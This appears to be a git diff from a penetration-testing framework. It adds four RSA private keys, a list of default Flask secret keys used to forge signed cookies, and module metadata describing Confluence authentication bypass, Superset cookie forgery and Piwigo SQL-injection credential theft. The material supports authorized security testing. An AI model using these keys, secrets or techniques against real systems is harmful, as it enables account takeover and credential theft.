@@ -0,0 +1,27 @@
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAwOk7AhHKSloJQjIQg4YB0XIK6Q7Yggu9lCg1PWnjLqJQDywP
7X0DMElimJRG2FRqCh8QomQjDUydeVoY4jIxnkrQw9PAGPHNCgDkBIvP8W7pBKbA
MQjRIHbKHdnlrjLyQfUr6g9suLfHDSyavHNxxJX5vZbKvRQmTXBq/rqpO+4C2uHV
GhFi+Ka3TZ2lYFtjWOmbxHiwvoahwfxj/ifb+XI6vdAR4v6JIMvJxEmO1rylJo0a
NL29/0rvtU6v7mYk6bcCNr3tv0GbBsBu6cdv8lueWq/9r4uGV4Y+tZ9vErQJBR6R
gcdzqKla4zF8huk0P/uDqGEeoYsXwi2XXG0mFQIDAQABAoIBAQC6RHllliftguJN
uGmZlVtMEQHX5y3G4+85j1lY41UpQjBrdfArL/pUNYeuK/38BAYfn79ADdCKlt+2
vPgp8K1YWoUZkOx7KX8BmbqRaS5vwNfeVeRddFX5MroV+L99ZFPmvASbDCm+cjUQ
03DVZeMEHov2NBOuXjZdr56gNzwRUCHim+sUcxWD1033AYmuJ1o9iQ2YFc7bACiB
9qYvfV19hxZZ5qzQaC1R1tSqKlXY69slKEc67V1vT6aUyl1+oqtt9EY8Sw4E/TTy
ntkY/AHDuUCIVQrcfpio6UV+Vo1eX0U7F9F7Pc+U/2zNemyyq+4PXAKtc/LjtouR
FXEnaygBAoGBAO4l6EEeV9kpH2Rj5mY3ECbjyfwTOyMlA39OudVZklRk8H7aoadA
et+Gtv8/rE5rJkz2EU2PyVjuGtKN1ZEMnDOlM+nbPDWnP+1ieYVmB2HY9Kv3y+CQ
tYaZuBC6EfJifgIxQJYEB2Ma+vthKhiHpJEe5FzNB1MLM5VXJlKQxeI1AoGBAM9f
OAzUUA5IACoC9jl3aqj8pqqgdkqq3QcgWLnbQ9rXWjvqcWIP4n+eE9vL4lEKz86C
KB7WEJUb4UBInDGudW5zDYgkB4kJRJEpeOZPsCc3AMncK01FonRZ7AaY27Iy2Jv7
8iBwSiadSN86q05TL4hqYwFGtUE7bN9m0SWb9rBhAoGBAKwW3HRh9t1IKBUlU5K9
a4COzqDHTM6iqppOS19usJ0nq9ofJv1zTNdFw+tDGcI5D55BmlNP+hG3Tc6lC5Ub
Zay0ToVJFYM37qwdou7QwbjlTDkQgVUvfN1dK3N64gkjPydaa+97zdLB5mfM2NyM
+FCd4CtnRUmvKIFcTqcPUs+ZAoGAPoi1S1EfDx9xRTn9bFjxhiIiVGPtKBkcbBC6
ENnpPW4hnN3W8T5fDCLsVCTIi63Z+qlPVfUxrPVqWMtMpsK4UOVLGFndF9r+nVPH
TJSNR1YT28uUF0o/chzHyzl/Tt58aZVxb4zNH5Xgqshzbjwxok6KqpDbCd/Utg24
VkIRAyECgYEAwgnMIysZVk329LhPzjMQgDSThQnautMJ0SjafSYWn2ASlWOn1XWk
p3POBuQHSHLkMf7aDfka3rPRhn1yTTFgd5oHjTLexU+xMGhXkbVy3alUGAcZE8lH
FkyKZUYTisGZn3qrMKNim/+o5DGXn02RbOS5iNiX4wxNVJ+DtEk9Q6I=
-----END RSA PRIVATE KEY-----
@@ -0,0 +1,27 @@
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA0h41gxtVvp/p62gUE+KrgD+8kOEDM75UDaDqZDw8VmNnjKDx
VSR01+7732O4bwCY8iPRe+0TAYRS+vv6HH/QYwxl9OYhAUXZijjn5pVGojEWCTaD
z/GV+/U7QhjgfPS2qW46tuQOXQSRShDDkCDEHR8mspOSQSyGbSmpPYXOt8eXssvC
yd4XM8eJhaoZzZAg8kFhFiy/l5J2yAeCFePMEbNxVPon0rf6BnXucGycoJtZWAAR
HKnBW1shHIT+DNDMo9HUU7s1qVY8IRET6LqbDtgRgFS1PDD73KFlgozoquuwVZuK
F6Uuwl6KU8f5Lgp7jvPWaqguTxvFyiVKZlhdgwIDAQABAoIBAQCceGqZK636utNT
vrnU5SOZ6dzedvIPgljNnVtvMXwtSPE/xEpzgSaR9yISBQy/fM5o40uI4c8ZfhTd
Wu+ycWwZlo4GhalmbUHGsQHgsKFc/vjN+47FN77dVo2+dxAVfZbZLYED2Wjo1BHt
+fXoSr5AgYYrzcFIT4P7nt6tNgvuxpXsMNAIN7uP7Hcdme7xb3DCxcti5x9sbljX
GM3sI1MbqBnhkBpDxzQrBBMkpn37+8P9vYsCtBUzpI/XZvDJ3cIRbBG2Ph+tbeQm
cANuj5YVeiKq3/p5EKdMbH7a/+x0+faIWHol8GqMW/GNL69tDMvO46kE9cqhf96d
rtOA032BAoGBAPI8QriLzzflfP4GU7V+dO4vVtC7nzeks1Y8LGseDk81LGpJBpuG
EqHzPhvNrJlmensefIRk7ItOFQVf8erZ2dkvHJQTo7zGX65avNfk2hh0NTfqa4a6
rA+i+i2bymBjt1aGtELuZIZAFiMM5/1qq3dW9NzF6w+5I2V1NgvuUHmxAoGBAN4O
vpsIc1sPDThLG6kiBk9OXpUXi2ZRLQa1xN1Tby8bn8cwqMT+OpanA2CzRnNiHFYL
WH2sJBCZwmMDJJq3g82BA17/Z8fivrvUB4PNOW2TGjxyaqdgilAtYT9fpJgSodY9
W3ZrsFI/kX6KMwbLuIVNCyqHLnc87lNLO7zdlqNzAoGAOMXm3VnnNzKSGPdipyb8
QNbXghR3PJNddNilkHV65RWRU1fKNKk3tL1N0TZjPZDHJBQBGwaMahni01+pU2G7
rStdh1cTCSt1QWgC2pbIhvK1hmVqzijyKrgH6qiYxf6Y+a6YkRdOeCiNB6n+tWZK
ya2Xtias8QJzSVQvVpyEQAECgYEA2QQN8dP7cQWvxNFakhwHkKAlvY3KFc/FsmYY
pLky0xYrO+9pMUTIm41TtsDeXEuJJ+pkrEV85aBvonZi4rXxIPkyAziXA3mtMEHS
qlP6CQWXwXWMmFG4Ow1umhHt+RVUht1mMsCiDG/F0KZdogmdJuGZxRFiLvQkctD2
6+ifnNMCgYAHGFS675HYCVgoa5E1FmK9Vc7C+PjHqARrKinmbODB0GBMnKDk7qww
GeL0TlxQnJNabxwa1cUK9mW50pihAMlDOfwtxGuMhkyvH7sH400Iazb/y0rordHT
A9a33jHpjIsviQD/R5oKXF2GEOUK1GTfhXYY6Nan/LTxxHiDFF/hIQ==
-----END RSA PRIVATE KEY-----
@@ -0,0 +1,27 @@
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAoUJXpD/5Wh7r4GIKD9UseSse3XTmMoS6IhsgmEkathmwdTww
qzxA4vDcDufewZV5Jb6ekCe5+ImYCyu6SNJTm2w4LN9FRhyPHG6US+ZmCpfm6tVm
uuada98jcbfLw1cZfai+2vqKGDX4+N6Tcs10tnQZ4seqln5Lb97NJ5pnWYhhz0DJ
C93N4GpZIcj3rz2AKvxOCGWWqFV9yv5fUhzw9NPW65+NYkHtw/6dNOMA2+6w125D
U4cax94nKfMVfXOlPY4gCxDNX2LmvQm6Dc9nXywqoK72M4yooKQ621n4U+o5WPcZ
Mvg75rYJN/d+J0NrYtfTejwThYp6XBd9B41IUQIDAQABAoIBAGJjifmrFsaHqz8i
UiVK2XGsf4567qDQHokEqCSCJgwJLIK7EK7JeoV8k6d8jYrrWhlPboth0bP0r5HR
Qj2AJobjxnqKV0fp0N92EIEmuAeqmreZMK7EWjQg1w1hKK+sit8CgEA3MN6Iv7mI
g8o91QIlYE3fqRNdR0WgWOfa60fSWBmblw/zy9trEN8SYVTV4IKxYGtZzxw3Ka4P
w23d0Vq0lB4iYjiaLXWwlsDBerUM/SVDck6k5EDmxmTD5s3edm0CGsxesaxxG/8w
mUU03IQ5rBuhdhhvrqnvQMrvWFXPRRFmFEpyQ0UxNSXZNIWAiw3CdFBHxGDI7PkR
lwstaeECgYEA1sYMIkFauOYM6ff1MCFbWtz7YHv15zuaAvaRLQqZ+gn3wsgRTJTl
CgYSdWCf74Sk3cUBdS6M4xqoEZAMzNIYV/HNj8F89m6+HE6r18cFhXzKQGq2FbgK
p4CDe6p5Sv4gl9H8lqqH46/TVipxSrxr68bSrwdQyPGU+laEpbQ8PKUCgYEAwDaZ
e4cUARkADJ6E8JJvHUxaQfbAG3S7v9aOP371teFO1wgF2D9OsGWSPVuQwYb5Zfaf
aUu3UjV1CSU13dFDOkWXAGM6ZmgubF4TW95+yS1w7rJlZYjTbxE2Ew8fyEFrEHK9
eREsouTEcLS/nSBqUut847EitHRmgE2ymHNWcT0CgYAFCyOPzl8WBnj5KZR9a9sc
WCIjEuYkZvbn6Ohh2WTiRUenMFGPrdNvF9NpJDq9Qi0o9A5jtRMj5iVaPDrAuJJP
xmLgZFfN5a3bNlG8wHS1vMd3Gcpq2iaN5muwBMHSbANR7WF0HE8Snrdkx5xfd+tE
3ydlatOP1HR+KHf2+DON7QKBgQCwhnRWuitpBqjA7iRxPErHwYNy6UZs8Lws5sMl
FVhbfVyGp1uWyi1eWyn/J8S9t1P8jI7CiUMHQQkHKSFbYgA32Alh1b+gpTVdWNi2
mpQd9pms3jG5Gfv0GP5saotpwoqtRHM2aMtxnl+6koUXrNl45cSA6AFTcUNhufm3
gNV2kQKBgBXOVa2ntVpqCng6pecJICknw6Dr6/H6YE01Ks7sXaHwD5bupkokxnFW
JcVtJFNGUbLJHowG1rt6B1/w2IXpZZB2P4hQi+9033PxT+C+B13VaMkWTu+KbUhv
Ji18eBNs+D3YHrR6sMyprth65c+GszaC/ZqyHxitP3UQhic41y+9
-----END RSA PRIVATE KEY-----
@@ -0,0 +1,27 @@
-----BEGIN RSA PRIVATE KEY-----
MIIEpgIBAAKCAQEA99Bv5dUKWoLUuE2CRiri7LazYVFqH09vOZwBXPc61arFiZaI
IrdqMxrkQ1AuBSfMVjSdOFYcgXF7FQmHe0YFCJrJFvc3xKbQQFFZHRiWfDggSNDq
yt9T7xeb2suk3MI6jVT7Q/txnDZGSY9jDIwGDYygQ+VNBX+4A6A22XNZM4apdEx1
Y5jiuty7wqoQeYZ9Syb5ge7EErClM+DmpIquqURHHtlAxidi3d9PKLSgWywkuXhQ
kY9NxigdqX5p5fmeEdvCOoB0rimqpnQD6rOzkTyr7cEklyYeUtZH0nG53dZopAP4
RYeCq1ckGzfVGKc1USE66zEUFhRJTc341/sbmQIDAQABAoIBAQDLawmvO2U4TtSW
ROl+9402ifJNHCtkcCv4uhpUWYyt/3QPMMWm2bAPKy/cIWDlUnnk+WNk7yqPBrvl
1OClTCCto4EVnPDmN5gSc7QWsiw04018+CEDTrbzOAnzW96EZ9rwUKXAdBIaDGM9
1rmTfw0o6hpUIVFMBj7imwzrCkhahb3cRjOaPWn2HLQhVuExMx4XlcWHTlBAXQWB
czeci/KY88loE96cn9YFP4ADF98L6vgi4WY3oXK7Jwv638IYUyksb4RTJirDXcuc
yEZXMCzFkrzAhlZIX7ZgFULM9qgD17g9PaRmiYa3o7eUJ0d0Yq3Wnt2CnWDz+t9x
wnAM5XABAoGBAP/oNgi5pNh+sSP/V/CjQ46+q81pBNMYauaTcFG14yY9oSgH2rtS
j1Shvu9AHd4YskUiMs+6/6hNXkXwEClBwr5W5dxZixQYIu8tjVd3OoESvHg6VgUE
1WTRuzX9rCQ/jCmE2+zr5JBnjzDBOKDvqicfrmGPLyC1iqIpYkxiBuKBAoGBAPfn
eUXtAh/0wf7nOavqCYapn8pAwSu03YAzGZs74YlF0pVMCdCxrJAHTCYbOOM/hB0o
8CVLZhT+ibzDBobhNxOB0IdlX0wY421vobIH5Thn2gQ2XRmtRztv9QFWG1nWQPno
BcE1XawnXpPHL7TbQksxmPmsb2wb3FfXCO5htn0ZAoGBAN0klB0yICweP4H2FM6U
p7rhNqIJkOvC/A5JdxSFc8gGFg/7yZ97FvVx2Qfzhlv5R4TKqtIsrOWKBl+1tqGQ
fHPzsCudDbzNptK9sJjXJa2IvWnAL7mila3MOFXN40Zny/3NHCg/KYNImsrtDry0
n3uzuwP/siA4AZdk39dWFtEBAoGBAKqvWkV1+QeNmuBpzcB7JFHuilFUImx4XCW/
iTrjkNbWFzaqIvvoyTple92k0pdMjScSn73d2wxLcQRhdyX4/NXWhIAkoOehHz2j
Jb6RRxZ+EpLh51odfzUCUbu40J4bMaOfSA8OMk+sz6aJ92PbrxpcrMoDGrhhumVU
bhbLej1JAoGBAJzpodByDrSqmPSb8S5iRUiaJRTlg7BFIAo9+rmEqbl9pW4dFZQm
kKNljx0zaJAqfqaPCi9WQLARXtYhBZbpUnhAsB89yjO4T0LFMhh2jAoJYZuOMnK9
S8O/Gb4TUWDP6kGOmF9X2Wcc1FSyydmGHqR6OO3h1UdrhENNN3SSpshx
-----END RSA PRIVATE KEY-----
Binary file not shown.
Binary file not shown.
Binary file not shown.

After

Width:  |  Height:  |  Size: 256 KiB

+69
View File
@@ -0,0 +1,69 @@
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Example plugin changelog</title>
<style type="text/css">
BODY {
font-size : 100%;
}
BODY, TD, TH {
font-family : tahoma, verdana, arial, helvetica, sans-serif;
font-size : 0.8em;
}
H2 {
font-size : 10pt;
font-weight : bold;
}
A:hover {
text-decoration : none;
}
H1 {
font-family : tahoma, arial, helvetica, sans-serif;
font-size : 1.4em;
font-weight: bold;
border-bottom : 1px #ccc solid;
padding-bottom : 2px;
}
TT {
font-family : courier new;
font-weight : bold;
color : #060;
}
PRE {
font-family : courier new;
font-size : 100%;
}
.events TH {
font-size: 8pt;
font-family: verdana;
font-weight: bold;
text-align: left;
background-color: #eee;
border-bottom: 1px #ccc solid;
}
.events .event {
font-weight: bold;
}
.events TD {
border-bottom: 1px #ccc dotted;
vertical-align: top;
}
</style>
</head>
<body>
<h1>
Example plugin
</h1>
<h2>Todo</h2>
<p>
Add changelog content here
</p>
</body>
</html>
Binary file not shown.
Binary file not shown.

After

Width:  |  Height:  |  Size: 1.5 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1021 B

+10
View File
@@ -0,0 +1,10 @@
<?xml version="1.0" encoding="UTF-8"?>
<plugin>
<class>com.example.openfire.plugin.Example</class>
<name>PLUGINNAME</name>
<description>PLUGINDESCRIPTION</description>
<author>PLUGINAUTHOR</author>
<version>1.0.0</version>
<date>7/7/2008</date>
<minServerVersion>3.5.0</minServerVersion>
</plugin>
+69
View File
@@ -0,0 +1,69 @@
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Example plugin readme</title>
<style type="text/css">
BODY {
font-size : 100%;
}
BODY, TD, TH {
font-family : tahoma, verdana, arial, helvetica, sans-serif;
font-size : 0.8em;
}
H2 {
font-size : 10pt;
font-weight : bold;
}
A:hover {
text-decoration : none;
}
H1 {
font-family : tahoma, arial, helvetica, sans-serif;
font-size : 1.4em;
font-weight: bold;
border-bottom : 1px #ccc solid;
padding-bottom : 2px;
}
TT {
font-family : courier new;
font-weight : bold;
color : #060;
}
PRE {
font-family : courier new;
font-size : 100%;
}
.events TH {
font-size: 8pt;
font-family: verdana;
font-weight: bold;
text-align: left;
background-color: #eee;
border-bottom: 1px #ccc solid;
}
.events .event {
font-weight: bold;
}
.events TD {
border-bottom: 1px #ccc dotted;
vertical-align: top;
}
</style>
</head>
<body>
<h1>
Example plugin
</h1>
<h2>Todo</h2>
<p>
Add readme content here
</p>
</body>
</html>
BIN
View File
Binary file not shown.
Binary file not shown.
Binary file not shown.
File diff suppressed because one or more lines are too long
+5
View File
@@ -0,0 +1,5 @@
\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h
CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
thisISaSECRET_1234
YOUR_OWN_RANDOM_GENERATED_SECRET_KEY
TEST_NON_DEV_SECRET
@@ -58,3 +58,4 @@ elementor
bookingpress
paid-memberships-pro
woocommerce-payments
file-manager-advanced-shortcode
+3725 -388
View File
@@ -1260,6 +1260,67 @@
"session_types": false,
"needs_cleanup": false
},
"auxiliary_admin/http/atlassian_confluence_auth_bypass": {
"name": "Atlassian Confluence Data Center and Server Authentication Bypass via Broken Access Control",
"fullname": "auxiliary/admin/http/atlassian_confluence_auth_bypass",
"aliases": [
],
"rank": 300,
"disclosure_date": "2023-10-04",
"type": "auxiliary",
"author": [
"Unknown",
"Emir Polat"
],
"description": "This module exploits a broken access control vulnerability in Atlassian Confluence servers leading to an authentication bypass.\n A specially crafted request can be create new admin account without authentication on the target Atlassian server.",
"references": [
"CVE-2023-22515",
"URL-https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html",
"URL-https://nvd.nist.gov/vuln/detail/CVE-2023-22515",
"URL-https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis"
],
"platform": "",
"arch": "",
"rport": 8090,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2023-10-19 17:11:03 +0000",
"path": "/modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb",
"is_install_path": true,
"ref_name": "admin/http/atlassian_confluence_auth_bypass",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"ioc-in-logs",
"config-changes"
]
},
"session_types": false,
"needs_cleanup": false
},
"auxiliary_admin/http/axigen_file_access": {
"name": "Axigen Arbitrary File Read and Delete",
"fullname": "auxiliary/admin/http/axigen_file_access",
@@ -3094,7 +3155,7 @@
"https"
],
"targets": null,
"mod_time": "2022-10-03 19:50:04 +0000",
"mod_time": "2023-09-15 16:35:55 +0000",
"path": "/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb",
"is_install_path": true,
"ref_name": "admin/http/netgear_pnpx_getsharefolderlist_auth_bypass",
@@ -3111,6 +3172,9 @@
"SideEffects": [
"config-changes",
"ioc-in-logs"
],
"RelatedModules": [
"exploit/linux/telnet/netgear_telnetenable"
]
},
"session_types": false,
@@ -3158,7 +3222,7 @@
"https"
],
"targets": null,
"mod_time": "2023-02-03 18:12:53 +0000",
"mod_time": "2023-09-15 16:35:55 +0000",
"path": "/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb",
"is_install_path": true,
"ref_name": "admin/http/netgear_r6700_pass_reset",
@@ -3174,6 +3238,9 @@
],
"Reliability": [
],
"RelatedModules": [
"exploit/linux/telnet/netgear_telnetenable"
]
},
"session_types": false,
@@ -5249,7 +5316,7 @@
],
"targets": null,
"mod_time": "2023-03-06 12:54:07 +0000",
"mod_time": "2023-09-13 15:34:17 +0000",
"path": "/modules/auxiliary/admin/kerberos/forge_ticket.rb",
"is_install_path": true,
"ref_name": "admin/kerberos/forge_ticket",
@@ -10301,7 +10368,7 @@
"author": [
"h00die"
],
"description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from various web applications.\n Atlassian uses PBKDF2-HMAC-SHA1 which is 12001 in hashcat.\n PHPass uses phpass which is 400 in hashcat.\n Mediawiki is MD5 based and is 3711 in hashcat.",
"description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from various web applications.\n Atlassian uses PBKDF2-HMAC-SHA1 which is 12001 in hashcat.\n PHPass uses phpass which is 400 in hashcat.\n Mediawiki is MD5 based and is 3711 in hashcat.\n Apache Superset, some Flask and Werkzeug apps is pbkdf2-sha256 and is 10900 in hashcat",
"references": [
],
@@ -10315,7 +10382,7 @@
],
"targets": null,
"mod_time": "2021-01-27 13:50:39 +0000",
"mod_time": "2023-09-14 13:21:01 +0000",
"path": "/modules/auxiliary/analyze/crack_webapps.rb",
"is_install_path": true,
"ref_name": "analyze/crack_webapps",
@@ -10855,7 +10922,7 @@
"needs_cleanup": false
},
"auxiliary_cloud/aws/enum_ssm": {
"name": "Amazon Web Services EC2 instance enumeration",
"name": "Amazon Web Services EC2 SSM enumeration",
"fullname": "auxiliary/cloud/aws/enum_ssm",
"aliases": [
@@ -10868,7 +10935,7 @@
],
"description": "Provided AWS credentials, this module will call the authenticated\n API of Amazon Web Services to list all SSM-enabled EC2 instances\n accessible to the account. Once enumerated as SSM-enabled, the\n instances can be controlled using out-of-band WebSocket sessions\n provided by the AWS API (nominally, privileged out of the box).\n This module provides not only the API enumeration identifying EC2\n instances accessible via SSM with given credentials, but enables\n session initiation for all identified targets (without requiring\n target-level credentials) using the CreateSession mixin option.\n The module also provides an EC2 ID filter and a limiting throttle\n to prevent session stampedes or expensive messes.",
"references": [
"URL-https://www.sempervictus.com/single-post/once-upon-a-cloudy-air-i-crossed-a-gap-which-wasn-t-there"
],
"platform": "",
"arch": "",
@@ -10880,7 +10947,7 @@
],
"targets": null,
"mod_time": "2023-05-22 17:11:16 +0000",
"mod_time": "2023-08-01 15:02:11 +0000",
"path": "/modules/auxiliary/cloud/aws/enum_ssm.rb",
"is_install_path": true,
"ref_name": "cloud/aws/enum_ssm",
@@ -17510,6 +17577,73 @@
"session_types": false,
"needs_cleanup": false
},
"auxiliary_gather/apache_superset_cookie_sig_priv_esc": {
"name": "Apache Superset Signed Cookie Priv Esc",
"fullname": "auxiliary/gather/apache_superset_cookie_sig_priv_esc",
"aliases": [
],
"rank": 300,
"disclosure_date": "2023-04-25",
"type": "auxiliary",
"author": [
"h00die",
"paradoxis",
"Spencer McIntyre",
"Naveen Sunkavally"
],
"description": "Apache Superset versions <= 2.0.0 utilize Flask with a known default secret key which is used to sign HTTP cookies.\n These cookies can therefore be forged. If a user is able to login to the site, they can decode the cookie, set their user_id to that\n of an administrator, and re-sign the cookie. This valid cookie can then be used to login as the targeted user and retrieve database\n credentials saved in Apache Superset.",
"references": [
"URL-https://github.com/Paradoxis/Flask-Unsign",
"URL-https://vulcan.io/blog/cve-2023-27524-in-apache-superset-what-you-need-to-know/",
"URL-https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/",
"URL-https://github.com/horizon3ai/CVE-2023-27524/blob/main/CVE-2023-27524.py",
"EDB-51447",
"CVE-2023-27524"
],
"platform": "",
"arch": "",
"rport": 8088,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2023-09-14 13:21:01 +0000",
"path": "/modules/auxiliary/gather/apache_superset_cookie_sig_priv_esc.rb",
"is_install_path": true,
"ref_name": "gather/apache_superset_cookie_sig_priv_esc",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
],
"SideEffects": [
"ioc-in-logs"
],
"RelatedModules": [
"exploit/linux/http/apache_superset_cookie_sig_rce"
]
},
"session_types": false,
"needs_cleanup": false
},
"auxiliary_gather/apple_safari_ftp_url_cookie_theft": {
"name": "Apple OSX/iOS/Windows Safari Non-HTTPOnly Cookie Theft",
"fullname": "auxiliary/gather/apple_safari_ftp_url_cookie_theft",
@@ -18763,6 +18897,63 @@
"session_types": false,
"needs_cleanup": false
},
"auxiliary_gather/elasticsearch_enum": {
"name": "Elasticsearch Enumeration Utility",
"fullname": "auxiliary/gather/elasticsearch_enum",
"aliases": [
"auxiliary/scanner/elasticsearch/indices_enum"
],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Silas Cutler <Silas.Cutler@BlackListThisDomain.com>",
"h00die"
],
"description": "This module enumerates Elasticsearch instances. It uses the REST API\n in order to gather information about the server, the cluster, nodes,\n in the cluster, indicies, and pull data from those indicies.",
"references": [
"URL-https://www.elastic.co/guide/en/elasticsearch/reference/current/rest-apis.html"
],
"platform": "",
"arch": "",
"rport": 9200,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2023-08-24 17:24:20 +0000",
"path": "/modules/auxiliary/gather/elasticsearch_enum.rb",
"is_install_path": true,
"ref_name": "gather/elasticsearch_enum",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
],
"SideEffects": [
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": false
},
"auxiliary_gather/emc_cta_xxe": {
"name": "EMC CTA v10.0 Unauthenticated XXE Arbitrary File Read",
"fullname": "auxiliary/gather/emc_cta_xxe",
@@ -20560,7 +20751,7 @@
],
"targets": null,
"mod_time": "2023-02-24 13:50:04 +0000",
"mod_time": "2023-08-14 16:14:36 +0000",
"path": "/modules/auxiliary/gather/ldap_query.rb",
"is_install_path": true,
"ref_name": "gather/ldap_query",
@@ -21535,6 +21726,178 @@
"session_types": false,
"needs_cleanup": false
},
"auxiliary_gather/piwigo_cve_2023_26876": {
"name": "Piwigo CVE-2023-26876 Gather Credentials via SQL Injection ",
"fullname": "auxiliary/gather/piwigo_cve_2023_26876",
"aliases": [
],
"rank": 300,
"disclosure_date": "2023-04-21",
"type": "auxiliary",
"author": [
"rodnt",
"Rodolfo Tavares",
"Tempest Security, Henrique Arcoverde"
],
"description": "This module allows an authenticated user to retrieve the usernames and encrypted passwords of other users in Piwigo through SQL injection using the (filter_user_id) parameter.",
"references": [
"CVE-2023-26876",
"URL-https://nvd.nist.gov/vuln/detail/CVE-2023-26876"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2023-07-14 21:34:32 +0000",
"path": "/modules/auxiliary/gather/piwigo_cve_2023_26876.rb",
"is_install_path": true,
"ref_name": "gather/piwigo_cve_2023_26876",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": false,
"needs_cleanup": false
},
"auxiliary_gather/prometheus_api_gather": {
"name": "Prometheus API Information Gather",
"fullname": "auxiliary/gather/prometheus_api_gather",
"aliases": [
],
"rank": 300,
"disclosure_date": "2016-07-01",
"type": "auxiliary",
"author": [
"h00die"
],
"description": "This module utilizes Prometheus' API calls to gather information about\n the server's configuration, and targets. Fields which may contain\n credentials, or credential file names are then pulled out and printed.\n\n Targets may have a wealth of information, this module will print the following\n values when found:\n __meta_gce_metadata_ssh_keys, __meta_gce_metadata_startup_script,\n __meta_gce_metadata_kube_env, kubernetes_sd_configs,\n _meta_kubernetes_pod_annotation_kubectl_kubernetes_io_last_applied_configuration,\n __meta_ec2_tag_CreatedBy, __meta_ec2_tag_OwnedBy\n\n Shodan search: \"http.favicon.hash:-1399433489\"",
"references": [
"URL-https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/"
],
"platform": "",
"arch": "",
"rport": 9090,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2023-08-15 18:04:59 +0000",
"path": "/modules/auxiliary/gather/prometheus_api_gather.rb",
"is_install_path": true,
"ref_name": "gather/prometheus_api_gather",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
],
"SideEffects": [
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": false
},
"auxiliary_gather/prometheus_node_exporter_gather": {
"name": "Prometheus Node Exporter And Windows Exporter Information Gather",
"fullname": "auxiliary/gather/prometheus_node_exporter_gather",
"aliases": [
],
"rank": 300,
"disclosure_date": "2013-04-18",
"type": "auxiliary",
"author": [
"h00die"
],
"description": "This modules connects to a Prometheus Node Exporter or Windows Exporter service\n and gathers information about the host.\n\n Tested against Docker image 1.6.1, Linux 1.6.1, and Windows 0.23.1",
"references": [
"URL-https://github.com/prometheus/node_exporter",
"URL-https://sysdig.com/blog/exposed-prometheus-exploit-kubernetes-kubeconeu/"
],
"platform": "",
"arch": "",
"rport": 9100,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2023-08-15 15:55:23 +0000",
"path": "/modules/auxiliary/gather/prometheus_node_exporter_gather.rb",
"is_install_path": true,
"ref_name": "gather/prometheus_node_exporter_gather",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
],
"SideEffects": [
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": false
},
"auxiliary_gather/pulse_secure_file_disclosure": {
"name": "Pulse Secure VPN Arbitrary File Disclosure",
"fullname": "auxiliary/gather/pulse_secure_file_disclosure",
@@ -21577,7 +21940,7 @@
"https"
],
"targets": null,
"mod_time": "2020-01-14 00:34:06 +0000",
"mod_time": "2023-09-15 16:35:55 +0000",
"path": "/modules/auxiliary/gather/pulse_secure_file_disclosure.rb",
"is_install_path": true,
"ref_name": "gather/pulse_secure_file_disclosure",
@@ -21590,6 +21953,9 @@
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
],
"RelatedModules": [
"exploit/linux/http/pulse_secure_cmd_exec"
@@ -21598,6 +21964,64 @@
"session_types": false,
"needs_cleanup": false
},
"auxiliary_gather/python_flask_cookie_signer": {
"name": "Python Flask Cookie Signer",
"fullname": "auxiliary/gather/python_flask_cookie_signer",
"aliases": [
],
"rank": 300,
"disclosure_date": "2019-01-26",
"type": "auxiliary",
"author": [
"h00die",
"paradoxis",
"Spencer McIntyre"
],
